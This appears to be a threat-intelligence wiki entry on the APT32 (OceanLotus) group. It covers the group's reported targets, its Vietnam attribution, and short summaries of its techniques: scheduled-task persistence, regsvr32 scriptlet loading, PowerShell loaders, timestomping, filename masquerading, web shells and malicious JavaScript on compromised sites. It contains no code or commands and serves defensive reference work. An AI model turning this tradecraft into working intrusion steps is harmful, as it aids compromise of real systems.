Group: APT32, OceanLotus Group

From enterprise
Jump to: navigation, search
APT32, OceanLotus Group
ID G0050
Aliases APT32, OceanLotus Group

APT32 is a threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as with foreign governments, dissidents, and journalists, and has extensively used strategic web compromises to compromise victims. The group is believed to be Vietnam-based.12

Alias Descriptions

  • APT32 - 12
  • OceanLotus Group - 12

Techniques Used

  • Scheduled Task - APT32 has used scheduled tasks to persist on victim systems.1
  • Regsvr32 - APT32 created a Scheduled Task that used regsvr32.exe to execute a COM scriptlet that dynamically downloaded a backdoor and injected it into memory.1
  • PowerShell - APT32 has used PowerShell-based tools and shellcode loaders for execution.1
  • Timestomp - APT32 has used scheduled task raw XML with a backdated timestamp of June 2, 2016.1
  • Masquerading - APT32 has used hidden or non-printing characters to help masquerade file names on a system, such as appending a Unicode no-break space character to a legitimate service name.1
  • Valid Accounts - APT32 has used legitimate local admin account credentials.1
  • Web Shell - APT32 has used Web shells to maintain access to victim websites.2
  • Remote File Copy - APT32 has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.2